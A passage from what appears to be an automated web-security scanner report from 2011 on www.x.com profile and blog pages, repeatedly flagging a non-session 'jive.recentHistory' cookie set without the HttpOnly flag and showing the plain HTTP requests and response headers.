
4.185. https://www.x.com/people/PayPal_ToddS  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_ToddS

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PayPal_ToddS HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c323839313b332c323430323b332c3133363236393b332c3133313833303b332c31323739393b332c3133373331333b332c3133373135383b332c3132393239303b332c3133393730313b332c3132323335343b; Expires=Sun, 11-Sep-2011 13:52:14 GMT; Path=/
Vary: User-Agent
JP: D=172832 t=1313157134792842
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.186. https://www.x.com/people/Praveen  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Praveen

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Praveen HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35353331393b332c35373137393b332c35333436333b332c35333437343b332c323030383b332c3133363935343b332c3133373131353b332c36303039313b332c35333735313b332c3133383538323b; Expires=Sun, 11-Sep-2011 13:51:53 GMT; Path=/
Vary: User-Agent
JP: D=139937 t=1313157113112925
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.187. https://www.x.com/people/Praveen/blog/2011/01/31/icanhas-instant-app-approval  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Praveen/blog/2011/01/31/icanhas-instant-app-approval

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Praveen/blog/2011/01/31/icanhas-instant-app-approval HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c35353331393b332c35333437343b332c323030383b332c35333436333b332c35373137393b332c3133363935343b332c3133373131353b332c36303039313b332c35333735313b332c3133383538323b; Expires=Sun, 11-Sep-2011 13:51:53 GMT; Path=/
Vary: User-Agent
JP: D=129836 t=1313157113665921
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.188. https://www.x.com/people/RightWayMail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/RightWayMail

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/RightWayMail HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134313133383b332c3131353037373b332c38323534333b332c3130383730353b332c3131303831343b332c38383139383b332c3131303734313b332c3131353130373b332c38353530363b332c3131313737343b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=143442 t=1313157149181583
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.189. https://www.x.com/people/S.Aijaz  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/S.Aijaz

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/S.Aijaz HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3132393239303b332c3134303635343b332c3133393730313b332c3132323335343b332c3133343430323b332c39313330313b332c34383739343b332c31303737303b332c31393037313b332c33353136303b; Expires=Sun, 11-Sep-2011 13:52:11 GMT; Path=/
Vary: User-Agent
JP: D=107761 t=1313157131723635
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.190. https://www.x.com/people/SRS  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/SRS

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/SRS HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38373839383b332c3133383934323b332c3131363438333b332c32333938353b332c3131303838353b332c33393238333b332c3131383939313b332c3134313133383b332c39323635363b332c3132323433393b; Expires=Sun, 11-Sep-2011 13:52:28 GMT; Path=/
Vary: User-Agent
JP: D=95619 t=1313157148836785
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.191. https://www.x.com/people/Saleem  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Saleem

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Saleem HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333437343b332c3133373131353b332c3133363935343b332c35333735313b332c36303039313b332c323030383b332c3133383538323b332c3133373331333b332c35353331393b332c3133363236393b; Expires=Sun, 11-Sep-2011 13:51:52 GMT; Path=/
Vary: User-Agent
JP: D=174302 t=1313157112089068
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.192. https://www.x.com/people/Shade8934  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Shade8934

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Shade8934 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c3133373131353b332c3133363935343b332c3133383538323b332c35333735313b332c36303039313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=78825 t=1313157110665049
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.193. https://www.x.com/people/Suneetha  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Suneetha

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Suneetha HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133373135383b332c3132393239303b332c3133393730313b332c3132323335343b332c3133343430323b332c39313330313b332c3134303635343b332c34383739343b332c31303737303b332c31393037313b; Expires=Sun, 11-Sep-2011 13:52:12 GMT; Path=/
Vary: User-Agent
JP: D=77775 t=1313157132121636
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.194. https://www.x.com/people/admin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/admin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/admin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:37 GMT; Path=/
Vary: User-Agent
JP: D=92314 t=1313157157248318
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.195. https://www.x.com/people/amypiazza00  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/amypiazza00

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/amypiazza00 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c36303039313b332c3133383538323b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=166730 t=1313157109973921
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.196. https://www.x.com/people/angelleye  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/angelleye

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/angelleye HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c323430323b332c3133373331333b332c3133313833303b332c3133363236393b332c31323739393b332c3133373135383b332c3132393239303b332c3133393730313b332c3132323335343b332c3133343430323b; Expires=Sun, 11-Sep-2011 13:52:14 GMT; Path=/
Vary: User-Agent
JP: D=188523 t=1313157134358773
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.197. https://www.x.com/people/billday  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/billday

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/billday HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b332c3131303734313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:35 GMT; Path=/
Vary: User-Agent
JP: D=155484 t=1313157155442148
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.198. https://www.x.com/people/blingnation2010  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/blingnation2010

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/blingnation2010 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b332c35333437343b332c35333735313b332c35373137393b332c3133363935343b; Expires=Sun, 11-Sep-2011 13:51:57 GMT; Path=/
Vary: User-Agent
JP: D=82638 t=1313157117852719
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.199. https://www.x.com/people/bryngregory  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/bryngregory

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/bryngregory HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:49 GMT; Path=/
Vary: User-Agent
JP: D=142323 t=1313157169831259
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.200. https://www.x.com/people/das_licht  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/das_licht

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/das_licht HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133373331333b332c3132393239303b332c39313330313b332c3132323335343b332c3133393730313b332c3134303635343b332c3133373135383b332c3133343430323b332c34383739343b332c31303737303b; Expires=Sun, 11-Sep-2011 13:52:12 GMT; Path=/
Vary: User-Agent
JP: D=93807 t=1313157132393620
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.201. https://www.x.com/people/dchankhour  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/dchankhour

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/dchankhour HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:44 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:44 GMT; Path=/
Vary: User-Agent
JP: D=75356 t=1313157164475506
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.202. https://www.x.com/people/eferreira  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/eferreira

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/eferreira HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133343430323b332c34383739343b332c39313330313b332c3134303635343b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=84607 t=1313157130615032
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.203. https://www.x.com/people/encore  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/encore

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/encore HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c31303939373b332c3133363236393b332c31323739393b332c323839313b332c323430323b332c3133313833303b332c323032353b; Expires=Sun, 11-Sep-2011 13:52:17 GMT; Path=/
Vary: User-Agent
JP: D=147969 t=1313157137124462
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.204. https://www.x.com/people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:48 GMT; Path=/
Vary: User-Agent
JP: D=175267 t=1313157108233489
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.205. https://www.x.com/people/gazugafan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gazugafan

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/gazugafan HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
